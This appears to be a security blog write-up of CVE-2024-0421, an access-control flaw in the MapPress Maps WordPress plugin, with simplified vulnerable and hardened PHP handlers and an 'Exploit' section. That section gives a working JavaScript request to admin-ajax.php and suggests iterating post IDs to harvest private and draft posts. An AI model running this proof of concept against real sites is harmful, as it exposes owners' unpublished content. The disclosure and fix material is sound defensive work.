A recently reported security vulnerability (CVE-2024-0421) affects the MapPress Maps for WordPress plugin in versions before 2.88.16. It exposes private and draft posts to unauthenticated users through an Insecure Direct Object Reference (IDOR): an AJAX action looks a post up by the ID supplied in the request and returns it without checking whether the requester is allowed to read it. In this post, we'll walk through the vulnerable pattern with simplified code, and show how it is exploited.

Vulnerability Details

MapPress Maps for WordPress is a popular plugin that allows users to create and display maps within their WordPress sites. An IDOR issue has been reported in the plugin that lets unauthenticated users read private and draft posts via its AJAX actions.

The vulnerability exists because the plugin does not verify that a post requested through AJAX is a public map before returning it: neither the post's status (publish, private, draft) nor the requester's capabilities are checked. The only thing an attacker needs is a post ID, and WordPress post IDs are small sequential integers, so private and draft posts can be retrieved by unauthenticated users with ease.

Original Reference: CVE-2024-0421

Affected Plugin: MapPress Maps for WordPress

The following simplified snippet illustrates the vulnerable pattern (it is a reduced version of the handler, not a verbatim copy of the plugin source):

// In the affected version of the plugin, the handler behind the AJAX action (shown here in
// simplified form as mappress_get_post()) looks the post up by ID and returns it without
// checking its status or whether the requester may read it. Because the action is registered
// on WordPress's wp_ajax_nopriv_ hook, the handler also runs for visitors who are not logged in.

function mappress_get_post() {
  // Retrieve the post ID from the request; any integer the attacker chooses is accepted
  $post_id = isset($_POST['postid']) ? $_POST['postid'] : null;

  // Get the post object; get_post() returns private and draft posts just as readily as published ones
  $post = get_post($post_id);

  // Send the whole WP_Post object (title, content, status, author, ...) back to the client
  wp_send_json_success($post);
}
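The snippet above next to a hardened handler, as an added example written for this post: it is not the plugin's own source or its patch. The function and hook names are assumptions modelled on the page's mappress_get_post(); the core functions it calls (get_post, absint, is_post_publicly_viewable, current_user_can, post_password_required, wp_send_json_error, wp_send_json_success) are real WordPress APIs.

```php
<?php
// Added example for this post (not the MapPress source or its patch).
// Function and hook names are assumptions modelled on the page's mappress_get_post().

// Wiring: the *_nopriv_ hook is what makes the handler reachable without logging in.
// A hardened handler can keep the nopriv hook, as long as it authorizes the read itself.
add_action('wp_ajax_nopriv_mappress_get_post', 'mappress_get_post_hardened');
add_action('wp_ajax_mappress_get_post', 'mappress_get_post_hardened');

// The page's vulnerable pattern: any ID in, whole WP_Post out.
function mappress_get_post_vulnerable() {
    $post = get_post(isset($_POST['postid']) ? $_POST['postid'] : null);
    wp_send_json_success($post);
}

function mappress_get_post_hardened() {
    // Coerce to a non-negative int; never pass null, because get_post(null)
    // silently falls back to the global $post.
    $post_id = isset($_POST['postid']) ? absint($_POST['postid']) : 0;
    $post    = $post_id ? get_post($post_id) : null;

    // Same error for "no such post" and "not yours to read", so the endpoint
    // cannot be used to enumerate which IDs exist. wp_send_json_error() ends
    // the request (it calls wp_die), so nothing below a $deny() call runs.
    $deny = static function () {
        wp_send_json_error(array('message' => 'not found'), 404);
    };

    if (!$post instanceof WP_Post) {
        $deny();
    }

    // The authorization check that was missing. is_post_publicly_viewable()
    // (WordPress 5.7+) is true only for a public status of a public post type,
    // so 'private' and 'draft' fail it; current_user_can('read_post', ...) then
    // lets the author or an editor fetch their own drafts when logged in.
    // A nonce would not fix this bug: it stops CSRF, not unauthenticated reads.
    if (!is_post_publicly_viewable($post) && !current_user_can('read_post', $post->ID)) {
        $deny();
    }

    // Published but password-protected posts are not public either.
    if (post_password_required($post)) {
        $deny();
    }

    // Return only what a map marker needs, not the serialized WP_Post
    // (post_content, post_password, post_author, ...).
    wp_send_json_success(array(
        'id'    => $post->ID,
        'title' => get_the_title($post),
        'url'   => get_permalink($post),
    ));
}
```

The two checks that matter are the status/capability test and the trimmed response: the first is the actual fix for the IDOR, the second limits the blast radius if another bug slips through, because a map endpoint never needs to hand out post_content or post_password.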

Exploit

To exploit this vulnerability, an attacker crafts an AJAX request to the target WordPress site that asks for the private or draft post by ID. This can be done with the following code, run from the site's own origin (for example the browser console on any of its pages), because admin-ajax.php sends no CORS headers and a cross-origin request would get an unreadable response:

// Crafting the AJAX request to exploit the IDOR vulnerability.
// Run this from the target site's own origin: from another origin the browser blocks
// the response and this.status reads 0 instead of 200.

function exploit(targetUrl, postId) {
  // Prepare the AJAX request
  const xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Print the response on successful exploitation (a JSON object whose
      // "data" member is the serialized post)
      console.log(this.responseText);
    }
  };

  xhttp.open("POST", targetUrl + "/wp-admin/admin-ajax.php", true);
  xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhttp.send("action=mappress_get_post&postid=" + encodeURIComponent(postId));
}

// Usage: exploit("https://example.com", 123)

The exploit code sends an AJAX request to the target WordPress site naming the vulnerable action and the desired postid. If the site runs a vulnerable version of the MapPress Maps for WordPress plugin, it answers with the JSON envelope produced by wp_send_json_success(), whose data member is the serialized post, including post_title, post_content and post_status, even when that status is private or draft. Because post IDs are sequential, an attacker can simply iterate over IDs to harvest every non-public post on the site.

Conclusion

CVE-2024-0421 is a serious security vulnerability affecting the MapPress Maps for WordPress plugin. It allows unauthenticated users to read private and draft posts through an IDOR in the plugin's AJAX handling. To protect your website, update the MapPress Maps for WordPress plugin to version 2.88.16 or later.

Stay tuned for more security news, updates, and exploits. Know that staying informed and vigilant is the key to keeping your website safe.

Timeline

Published on: 02/12/2024 16:15:08 UTC
Last modified on: 08/30/2024 13:15:12 UTC